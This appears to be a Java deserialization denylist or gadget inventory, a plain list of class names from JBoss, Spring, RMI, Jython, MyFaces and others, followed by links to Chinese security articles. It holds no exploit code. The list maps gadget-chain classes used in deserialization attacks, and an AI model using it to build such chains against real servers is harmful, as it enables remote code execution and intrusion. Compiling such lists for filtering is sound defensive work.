org.jboss.interceptor.builder.MethodReference
org.jboss.interceptor.proxy.DefaultInvocationContextFactory
org.jboss.interceptor.proxy.InterceptorMethodHandler
org.jboss.interceptor.reader.ClassMetadataInterceptorReference
org.jboss.interceptor.reader.DefaultMethodMetadata
org.jboss.interceptor.reader.ReflectiveClassMetadata
org.jboss.interceptor.reader.SimpleInterceptorMetadata
org.jboss.interceptor.spi.instance.InterceptorInstantiator
org.jboss.interceptor.spi.metadata.InterceptorReference
org.jboss.interceptor.spi.metadata.MethodMetadata
org.jboss.interceptor.spi.model.InterceptionType
org.jboss.interceptor.spi.model.InterceptionModel
sun.rmi.server.UnicastRef
sun.rmi.transport.LiveRef
sun.rmi.transport.tcp.TCPEndpoint
java.rmi.server.RemoteObject
java.rmi.server.RemoteRef
java.rmi.server.ObjID
java.rmi.RemoteObjectInvocationHandler
java.rmi.server.UnicastRemoteObject
java.rmi.registry.Registry
sun.rmi.server.ActivationGroupImpl
sun.rmi.server.UnicastServerRef
org.springframework.aop.framework.AdvisedSupport
net.sf.json.JSONObject
javax.xml.transform.Templates
org.jboss.weld.interceptor.builder.InterceptionModelBuilder
org.jboss.weld.interceptor.builder.MethodReference
org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory
org.jboss.weld.interceptor.proxy.InterceptorMethodHandler
org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference
org.jboss.weld.interceptor.reader.DefaultMethodMetadata
org.jboss.weld.interceptor.reader.ReflectiveClassMetadata
org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata
org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator
org.jboss.weld.interceptor.spi.metadata.InterceptorReference
org.jboss.weld.interceptor.spi.metadata.MethodMetadata
org.jboss.weld.interceptor.spi.model.InterceptionModel
org.jboss.weld.interceptor.spi.model.InterceptionType
org.python.core.PyObject
org.python.core.PyBytecode
org.python.core.PyFunction
org.apache.myfaces.context.servlet.FacesContextImpl
org.apache.myfaces.context.servlet.FacesContextImplBase
org.apache.myfaces.el.CompositeELResolver
org.apache.myfaces.el.unified.FacesELContext
org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression
com.sun.syndication.feed.impl.ObjectBean
org.springframework.beans.factory.ObjectFactory
org.springframework.core.SerializableTypeWrapper.$MethodInvokeTypeProvider
org.springframework.aop.framework.AdvisedSupport
org.springframework.aop.target.SingletonTargetSource
org.springframework.aop.framework.JdkDynamicAopProxy
org..springframework.transaction.jta.JtaTransactionManager
com.fr.third.springframework.beans.factory.ObjectFactory
com.fr.third.springframework.core.SerializableTypeWrapper.$MethodInvokeTypeProvider
com.fr.third.springframework.aop.framework.AdvisedSupport
com.fr.third.springframework.aop.target.SingletonTargetSource
com.fr.third.springframework.aop.framework.JdkDynamicAopProxy
com.fr.third.springframework.transaction.jta.JtaTransactionManager
com.vaadin.data.util.NestedMethodProperty
com.vaadin.data.util.PropertysetItem
java.util.PriorityQueue
java.lang.reflect.Proxy
javax.management.MBeanServerInvocationHandler
javax.management.openmbean.CompositeDataInvocationHandler
java.beans.EventHandler
java.util.Comparator
org.reflections.Reflections
com.fr.third.org.reflections.Reflections

参考文章

https://tttang.com/archive/1701/#toc__9

https://xz.aliyun.com/t/12509

https://xz.aliyun.com/t/13389

https://xz.aliyun.com/t/13900